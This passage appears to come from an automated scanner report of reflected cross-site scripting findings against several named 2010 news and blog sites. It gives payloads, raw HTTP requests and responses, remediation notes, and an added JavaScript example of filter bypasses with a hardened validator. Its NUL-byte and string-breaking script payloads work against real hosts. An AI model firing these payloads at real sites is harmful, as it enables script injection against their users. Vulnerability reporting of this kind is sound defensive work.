The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004d185"><a>4601cfb6140 was submitted in the REST URL parameter 1. This input was echoed as 4d185"><a>4601cfb6140 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
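The two bypasses recorded in this report (the double URL-decode defeated by %253c at cdn.widgetserver.com, and the NUL-byte bypass at dean.edwards.name) modelled side by side, with the remediation from both findings applied: decode exactly once, refuse control bytes, validate after canonicalisation. This is an added example and not code from the scan report, from either site, or from any WAF product; the accepted alphabet for a path segment is an assumption made for the example.

```javascript
// Added example, not code from the scan report or the scanned applications.
// It models the two filter bypasses recorded above: a blocklist check that
// runs before the application's own second URL-decode (defeated by %253c),
// and a native-code check that stops reading at a NUL byte (defeated by %00
// placed before the blocked characters). hardenedPathSegment shows the fix:
// decode exactly once, refuse control bytes, validate afterwards. The accepted
// alphabet for a path segment is an assumption made for this example.

const BLOCKED = /[<>"']/;

// What the web server hands to the application: the path, decoded once.
function serverDecodeOnce(wireValue) {
  return decodeURIComponent(wireValue);
}

// Flawed filter 1: the check sees "%3c" (harmless), then the application
// decodes a second time and "%3c" becomes "<".
function flawedDoubleDecodeFilter(serverDecodedValue) {
  if (BLOCKED.test(serverDecodedValue)) return { allowed: false, value: null };
  return { allowed: true, value: decodeURIComponent(serverDecodedValue) };
}

// Flawed filter 2: a C-style filter treats the value as a NUL-terminated
// string and inspects nothing after the first \0; the application, using
// length-counted strings, drops the NUL and uses the rest.
function flawedNulTerminatedFilter(serverDecodedValue) {
  const seenByFilter = serverDecodedValue.split("\0")[0];
  if (BLOCKED.test(seenByFilter)) return { allowed: false, value: null };
  return { allowed: true, value: serverDecodedValue.replace(/\0/g, "") };
}

// Hardened: one canonicalisation step, then an allow-list check on the
// canonical value. A malformed escape, any control byte, or any character
// outside the expected alphabet leads to rejection.
function hardenedPathSegment(wireValue) {
  let canonical;
  try {
    canonical = decodeURIComponent(wireValue); // the only decode
  } catch (e) {
    return { allowed: false, value: null };
  }
  if (/[\x00-\x1f\x7f]/.test(canonical)) return { allowed: false, value: null };
  if (!/^[A-Za-z0-9-]{1,64}$/.test(canonical)) return { allowed: false, value: null };
  return { allowed: true, value: canonical };
}

// Constructed wire-level inputs based on the payloads in this report.
const DOUBLE_ENCODED = "d7cfe%253ca%253e";
const NUL_PREFIXED = "%00aebf5%22%3E%3Ca%3E";
const LEGITIMATE = "58c04479-79ac-40a6-9463-ff079ae00951";

for (const wire of [DOUBLE_ENCODED, NUL_PREFIXED, LEGITIMATE]) {
  console.log(wire, {
    doubleDecode: flawedDoubleDecodeFilter(serverDecodeOnce(wire)),
    nulTerminated: flawedNulTerminatedFilter(serverDecodeOnce(wire)),
    hardened: hardenedPathSegment(wire),
  });
}
```

The hardened version never "cleans" the input: a second layer of percent-encoding shows up as a literal % in the canonical value and fails the allow-list, and a NUL shows up as a control byte and is rejected outright, so there is nothing left for a later decode or a native string routine to reinterpret.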
Request
GET /base%004d185"><a>4601cfb6140/forEach.js HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:16:18 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1537 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00e79b8<a>930c5a5050d was submitted in the REST URL parameter 1. This input was echoed as e79b8<a>930c5a5050d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /base%00e79b8<a>930c5a5050d/forEach.js HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:16:24 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1533 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00bf8e8<a>6fde2a89073 was submitted in the REST URL parameter 2. This input was echoed as bf8e8<a>6fde2a89073 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /base/forEach.js%00bf8e8<a>6fde2a89073 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:16:35 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1511 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aebf5"><script>alert(1)</script>02a200f0b70 was submitted in the REST URL parameter 1. This input was echoed as aebf5"><script>alert(1)</script>02a200f0b70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00aebf5"><script>alert(1)</script>02a200f0b70/2005/10/add-event/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:18:01 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1794 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00aadf9<a>a989804bd50 was submitted in the REST URL parameter 1. This input was echoed as aadf9<a>a989804bd50 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00aadf9<a>a989804bd50/2005/10/add-event/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:18:02 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1648 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4e584<a>f04cea051d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2005/10/add-event4e584<a>f04cea051d7/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:19:38 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Tue, 07 Dec 2010 23:19:38 GMT Last-Modified: Tue, 07 Dec 2010 23:19:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1356 Connection: close Content-Type: text/html; charset=UTF-8
4.16. http://dean.edwards.name/weblog/2005/10/add-event/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2005/10/add-event/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65aa"><script>alert(1)</script>dd1472c7339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d65aa\"><script>alert(1)</script>dd1472c7339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The backslash inserted before the quotation mark (typical of addslashes-style escaping) has no meaning inside an HTML attribute value: the browser still treats the " as closing the attribute, so the escaping does not prevent the attack.
Request
GET /weblog/2005/10/add-event/?d65aa"><script>alert(1)</script>dd1472c7339=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload f313a<script>alert(1)</script>ecc40386835 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that, as the response body shows, the echo point is actually inside a double-quoted JavaScript string in a text/javascript response, so a <script> tag will not execute there when the script is loaded; a string-terminating payload of the "-alert(1)-" form used elsewhere in this report is the relevant follow-up test, and the remediation is JavaScript-string encoding of the uid value.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.mercurynews.com%2F&uid=fC2x6y5eJIhcKcBK_187469609f313a<script>alert(1)</script>ecc40386835&xy=0%2C0&wh=728%2C90&vchannel=262034929&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://redcated/NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=f866ba45-336f-42c1-b17b-f0a6d405ba6f
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5F493F1D52EC04489167C8AFE94ADB23; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 148 Date: Tue, 07 Dec 2010 23:04:14 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("fC2x6y5eJIhcKcBK_187469609f313a<script>alert(1)</script>ecc40386835");
4.18. http://events.contracostatimes.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.contracostatimes.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a220"><script>alert(1)</script>e649cd5a30e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7a220"><script>alert(1)</script>e649cd5a30e=1 HTTP/1.1 Host: events.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?7a220"><script>alert(1)</script>e649cd5a30e=1" /> ...[SNIP]...
4.19. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.mercurynews.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7869"><script>alert(1)</script>f59b074de28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f7869"><script>alert(1)</script>f59b074de28=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; zvents_tracker_sid=iwud1gSS-tsOrG5dfNsJ8A.95549602; s_sq=%5B%5BB%5D%5D; welcome=iwud1gSS-tsOrG5dfNsJ8A.95549602; __qca=P0-326766520-1291762315669;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?f7869"><script>alert(1)</script>f59b074de28=1" /> ...[SNIP]...
4.20. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.mercurynews.com
Path: /movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5e1e"><script>alert(1)</script>6715bf84cbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?a5e1e"><script>alert(1)</script>6715bf84cbd=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; zvents_tracker_sid=iwud1gSS-tsOrG5dfNsJ8A.95549602; s_sq=%5B%5BB%5D%5D; welcome=iwud1gSS-tsOrG5dfNsJ8A.95549602; __qca=P0-326766520-1291762315669;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?a5e1e"><script>alert(1)</script>6715bf84cbd=1" /> ...[SNIP]...
4.21. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.contracostatimes.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c5e"-alert(1)-"5364fca3e44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?75c5e"-alert(1)-"5364fca3e44=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:22:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=91a81bfddc448d1e70609b2e4644b4e6; expires=Fri, 31 Dec 2010 02:55:49 GMT; path=/; domain=.forums.contracostatimes.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:22:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54603
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79da2"-alert(1)-"382347babb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum79da2"-alert(1)-"382347babb8/article-comments-comments-on-news HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:23:04 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=0c89588944bf90cb8f2842f87d81ddd6; expires=Fri, 31 Dec 2010 02:56:24 GMT; path=/; domain=.forums.contracostatimes.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:23:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22636
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddfe7"-alert(1)-"b0e7e1dbb38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/article-comments-comments-on-newsddfe7"-alert(1)-"b0e7e1dbb38 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:23:16 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=5bef9514c35222453a3f8cdbe8733edd; expires=Fri, 31 Dec 2010 02:56:36 GMT; path=/; domain=.forums.contracostatimes.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:23:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16724
4.24. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.contracostatimes.com
Path: /forum/article-comments-comments-on-news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 716bb"-alert(1)-"1cf095b9b07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/article-comments-comments-on-news?716bb"-alert(1)-"1cf095b9b07=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:22:30 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=1902f515b77768082963b8bc4eda9506; expires=Fri, 31 Dec 2010 02:55:50 GMT; path=/; domain=.forums.contracostatimes.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:22:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31781
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e641"-alert(1)-"9d0010d2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll9e641"-alert(1)-"9d0010d2e1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:22:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=76d68d1a4e8b8cec9600b1c34437ec03; expires=Fri, 31 Dec 2010 02:56:06 GMT; path=/; domain=.forums.contracostatimes.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:23:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22562
4.26. http://forums.contracostatimes.com/poll [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.contracostatimes.com
Path: /poll
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe39"-alert(1)-"09931698101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll?cbe39"-alert(1)-"09931698101=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:22:17 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=3fcb054e0ed856a11dd8cb47580a5646; expires=Fri, 31 Dec 2010 02:55:37 GMT; path=/; domain=.forums.contracostatimes.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:22:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20216
4.27. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d467a"-alert(1)-"03e35f549b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d467a"-alert(1)-"03e35f549b3=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:22:37 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=2e0950b18f0a572e7481e5cde043e951; expires=Fri, 31 Dec 2010 02:55:57 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:23:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50791
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56572"-alert(1)-"621f5ac4ac2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums56572"-alert(1)-"621f5ac4ac2/forum/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:23:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec1c09332ac64b0fae804f497fbfbb01; expires=Fri, 31 Dec 2010 02:56:58 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:24:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22005
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006668f"-alert(1)-"f958950ecdc was submitted in the REST URL parameter 2. This input was echoed as 6668f"-alert(1)-"f958950ecdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
